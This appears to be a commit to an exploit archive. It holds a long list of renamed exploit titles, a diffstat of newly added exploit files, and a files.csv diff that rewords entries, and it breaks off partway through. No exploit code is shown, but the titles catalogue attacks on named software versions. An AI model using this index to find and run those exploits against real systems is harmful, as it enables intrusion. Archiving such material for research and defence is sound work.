DebugMsgLog HeapSpray Data Dynamics ActiveBar - ActiveX (actbar3.ocx 3.1) Insecure Methods Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods Savant Web Server 3.1 - GET Remote Overflow (Universal) Savant Web Server 3.1 - GET Universal Remote Overflow ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow Apache Tomcat - WebDAV Remote File Disclosure (SSL) Apache Tomcat - WebDAV SSL Remote File Disclosure Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1) Linksys WRT54G Firmware 1.00.9 - Security Bypass (1) VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (2) Linksys WRT54G Firmware 1.00.9 - Security Bypass (2) BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow Microsoft Windows Server - Code Execution (MS08-067) (Universal) Microsoft Windows Server - Universal Code Execution (MS08-067) SpeedStream 5200 - Authentication Bypass Config Download SpeedStream 5200 - Authentication Bypass Configuration Download GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC) GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Amaya 11.1 - W3C Editor/Browser 'defer' Stack Overflow XBMC 8.10 - get tag from file name Remote Buffer Overflow XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray) Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1) Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1) Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2) Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2) Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Exploit VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow (Universal) VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow IBM Informix Client SDK 3.0 - nfx file integer Overflow IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow AOL 9.5 - ActiveX Exploit (Heap Spray) AOL 9.5 - ActiveX Heap Spray Exploit Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe) Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal Exploit Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal Exploit Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal Exploit Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7) Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray Exploit (Internet Explorer 6/7) Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray) Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081) Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081) Majordomo2 - Directory Traversal (SMTP/HTTP) Majordomo2 - 'SMTP/HTTP' Directory Traversal Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit) Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit) Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit) Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit) Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit) Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit) Zend Java Bridge - Remote Code Execution (ZDI-11-113) Zend Java Bridge - Remote Code Execution 7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit) 7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit) TFTP Server 1.4 - ST (RRQ) Buffer Overflow WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter) TFTP Server 1.4 - ST 'RRQ' Buffer Overflow WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter) MailMax 4.6 - POP3 'USER' Remote Buffer Overflow (No Login Needed) MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow AN-HTTPd 1.2b - CGI Vulnerabilities AN-HTTPd 1.2b - CGI Exploits Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities RedHat 6.1 / IRIX 6.5.18 - 'lpd' Exploit Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Apache 1.3 - Possible Directory Index Disclosure Apache 1.3 - Directory Index Disclosure Microsoft Outlook Express 6 - XML File Attachment Script Execution Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure Apache Tomcat 3/4 - DefaultServlet File Disclosure Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure Apache Tomcat 3.x - Null Byte Directory/File Disclosure Apache Tomcat 3.x - Null Byte Directory / File Disclosure Clearswift MAILsweeper 4.x - Malformed MIME Attachment Filter Bypass Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit) Aladdin Knowledge System Ltd - 'ChooseFilePath' Buffer Overflow (Metasploit) Mod_Gzip 1.3.x - Debug Mode Vulnerabilities Mod_Gzip 1.3.x - Debug Mode Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Vulnerabilities Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Microsoft Internet Explorer 6 - Script Execution Vulnerabilities Microsoft Internet Explorer 6 - Script Execution OpenSSL - ASN.1 Parsing Vulnerabilities OpenSSL - ASN.1 Parsing Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1) Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1) Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Vulnerabilities Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Exploit abctab2ps 1.6.3 - Write_Heading Function ABC File Remote Buffer Overflow abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow PCAL 4.x - Calendar File getline Buffer Overflow PCAL 4.x - Calendar File get_holiday Buffer Overflow PCAL 4.x - Calendar File 'getline' Buffer Overflow PCAL 4.x - Calendar File 'get_holiday' Buffer Overflow Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention Logic Print 2013 - Stack Overflow (vTable Overwrite) Logic Print 2013 - vTable Overwrite Stack Overflow EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Vulnerabilities CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Ability Mail Server 2013 (3.1.1) - Persistent Cross-Site Scripting (Web UI) Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting Microsoft - Tagged Image File Format (TIFF) Integer Overflow (Metasploit) Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit) Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution Multiple Browsers - URI Handlers Command Injection Vulnerabilities Multiple Browsers - URI Handlers Command Injection Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass Vulnerabilities Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass ProFTPd 1.3 - 'mod_sql Username' SQL Injection ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Webpage Remote Code Execution PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities Multiple Check Point Endpoint Security Products - Information Disclosure Bsplayer 2.68 - HTTP Response Exploit (Universal) Bsplayer 2.68 - HTTP Response Universal Exploit Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP) Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP) Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112) Acunetix WVS 10 - Remote Command Execution (System) Acunetix WVS 10 - Remote Command Execution Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution ZyXEL PK5001Z Modem - Backdoor Account PHP-Nuke - SQL Injection Edit/Save Message(s) PHP-Nuke - SQL Injection Edit/Save Messages phpBB - highlight Arbitrary File Upload (Santy.A) phpBB - highlight Arbitrary File Upload 'Santy.A' phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm) phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm' Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial) Invision Power Board 2.0.3 - 'login.php' SQL Injection phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber) phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber) vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3) vBulletin 3.0.8 - Accessible Database Backup Searcher (3) ibProArcade 2.x - module (vBulletin/IPB) SQL Injection ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection Website Baker 2.6.0 - Login Bypass / Remote Code Execution Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection) WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion E Annu 1.0 - Login Bypass (SQL Injection) E Annu 1.0 - Authentication Bypass / SQL Injection ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection' ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection) paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed) e107 0.7.8 - 'mailout.php' Authenticated Access Escalation Exploit TaskDriver 1.2 - Login Bypass / SQL Injection TaskDriver 1.2 - Authentication Bypass / SQL Injection IBM Rational ClearQuest - Web Login Bypass (SQL Injection) IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities Joomla! Component JoomlaXplorer 1.6.2 - Remote Exploits Xomol CMS 1.2 - Login Bypass / Local File Inclusion Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) cPanel 11.x - 'Fantastico' Local File Inclusion mxCamArchive 2.2 - Bypass Config Download mxCamArchive 2.2 - Bypass Configuration Download All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit All Club CMS 0.0.2 - Remote Database Configuration Retrieve Exploit OraMon 2.0.1 - Remote Config File Disclosure OraMon 2.0.1 - Remote Configuration File Disclosure Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing phpScribe 0.9 - 'user.cfg' Remote Config Disclosure phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure BlogHelper - Remote Config File Disclosure PollHelper - Remote Config File Disclosure BlogHelper - Remote Configuration File Disclosure PollHelper - Remote Configuration File Disclosure QuoteBook - Remote Config File Disclosure QuoteBook - Remote Configuration File Disclosure Free Joke Script 1.0 - Authentication Bypass / SQL Injection Free Joke Script 1.0 - Authentication Bypass Grestul 1.x - Authentication Bypass (Cookie SQL Injection) Grestul 1.x - Cookie Authentication Bypass S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities smNews 1.0 - Authentication Bypass / Column Truncation Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload phpAdBoard - 'conf.inc' Remote Config File Disclosure phpAdBoard - 'conf.inc' Remote Configuration File Disclosure W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure phpAdBoardPro - 'config.inc' Config File Disclosure W2B Restaurant 1.2 - 'conf.inc' Configuration File Disclosure phpAdBoardPro - 'config.inc' Configuration File Disclosure Job2C - 'conf.inc' Config File Disclosure Job2C - 'conf.inc' Configuration File Disclosure chCounter 3.1.3 - (Authentication Bypass) SQL Injection chCounter 3.1.3 - Authentication Bypass The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup The Recipe Script 5 - Authentication Bypass / Database Backup Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection Mlffat 2.1 - Cookie Authentication Bypass my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting Flash Image Gallery 1.1 - Arbitrary Config File Disclosure Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection Traidnt Up 2.0 - Cookie Authentication Bypass LightNEasy sql/no-db 2.2.x - System Config Disclosure LightNEasy sql/no-db 2.2.x - System Configuration Disclosure MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection WHOISCART - (Authentication Bypass) Information Disclosure WHOISCART - Authentication Bypass / Information Disclosure ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure mobilelib gold 3.0 - Authentication Bypass / SQL Injection Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection Arab Portal 2.2 - Blind Cookie Authentication Bypass Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype) Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection Joomla! Component com_virtuemart 1.0 - SQL Injection (Product_ID) Joomla! Component com_virtuemart 1.0 - 'Product_ID' SQL Injection Pre Job Board 1.0 - SQL Authentication Bypass Pre Job Board 1.0 - Authentication Bypass Pre Jobo .NET - SQL Authentication Bypass Pre Jobo .NET - Authentication Bypass SoftCab Sound Converter - ActiveX Insecure Method Exploit (sndConverter.ocx) SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method Exploit WSC CMS - (Authentication Bypass) SQL Injection WSC CMS - Authentication Bypass Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid) Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection 3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal) 3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval Yamamah Photo Gallery 1.00 - SQL Injection (calbums) Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection Elite Gaming Ladders 3.5 - SQL Injection (ladder[id]) Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery AV Arcade 3 - Cookie SQL Injection / Authentication Bypass AV Arcade 3 - Cookie Authentication Bypass MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection) MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload Seotoaster - SQL Injection Admin Login Bypass Seotoaster - SQL Injection BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities phpBB 1.x/2.0.x - '(Knowledge Base Module) 'KB.php' SQL Injection phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution Spid 1.3 - lang_path File Inclusion Spid 1.3 - 'lang_path' File Inclusion NETGEAR WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Configuration Download TWiki 4.0.x - Viewfile Directory Traversal TWiki 4.0.x - 'Viewfile' Directory Traversal ZonPHP 2.25 - Remote Code Execution (Remote Code Execution) ZonPHP 2.25 - Remote Code Execution pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass Vulnerabilities LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Vulnerabilities LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset) Ability Mail Server 2013 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset) WiFiles HD 1.3 iOS - Locla File Inclusion WiFiles HD 1.3 iOS - Local File Inclusion IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit) Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python) vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting ZTE F660 - Remote Config Download ZTE F660 - Remote Configuration Download Tango DropBox 3.1.5 + PRO - Activex Heap Spray Tango FTP 1.0 (Build 136) - Activex Heap Spray Tango DropBox 3.1.5 + PRO - Activex HeapSpray Tango FTP 1.0 (Build 136) - Activex HeapSpray Pinterestclones - Security Bypass / HTML Injection Vulnerabilities Pinterestclones - Security Bypass / HTML Injection Privoxy Proxy - Authentication Information Disclosure Vulnerabilities Privoxy Proxy - Authentication Information Disclosure ZTE ZXHN H108N Router - Unauthenticated Config Disclosure ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection Kodi 15 - Arbitrary File Access (Web Interface) Kodi 15 - Web Interface Arbitrary File Access ( OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit OpenMRS 2.3 (1.11.4) - XML External Entity Processing Exploit OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery Ingenious School Management System 2.3.0 - 'friend_index' SQL injection --- files.csv | 799 ++++++++++++++-------------- platforms/hardware/remote/43105.txt | 41 ++ platforms/ios/dos/43107.py | 51 ++ platforms/php/webapps/43106.txt | 49 ++ platforms/php/webapps/43108.txt | 37 ++ platforms/php/webapps/8461.txt | 7 - platforms/windows/local/43104.py | 53 ++ 7 files changed, 633 insertions(+), 404 deletions(-) create mode 100755 platforms/hardware/remote/43105.txt create mode 100755 platforms/ios/dos/43107.py create mode 100755 platforms/php/webapps/43106.txt create mode 100755 platforms/php/webapps/43108.txt create mode 100755 platforms/windows/local/43104.py diff --git a/files.csv b/files.csv index 02034108b..1ad915a6c 100644 --- a/files.csv +++ b/files.csv @@ -158,7 +158,7 @@ id,file,description,date,author,platform,type,port 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service",2005-04-03,c0d3r,windows,dos,0 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service",2005-04-04,"Daniel McNeil",linux,dos,0 916,platforms/windows/dos/916.pl,"MailEnable Enterprise 1.x - SMTP Remote Denial of Service",2005-04-05,CorryL,windows,dos,0 -931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 +931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling (MS05-020)",2005-04-12,Skylined,windows,dos,0 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot (Denial of Service)",2005-04-19,ChoiX,multiple,dos,0 @@ -223,7 +223,7 @@ id,file,description,date,author,platform,type,port 1204,platforms/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 -1218,platforms/windows/dos/1218.c,"Stoney FTPd - Denial of Service (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 +1218,platforms/windows/dos/1218.c,"Stoney FTPd - 'rxBot mods ftpd' Denial of Service",2005-09-16,D-oNe,windows,dos,0 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 @@ -250,7 +250,7 @@ id,file,description,date,author,platform,type,port 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 -1328,platforms/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 +1328,platforms/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0 @@ -350,7 +350,7 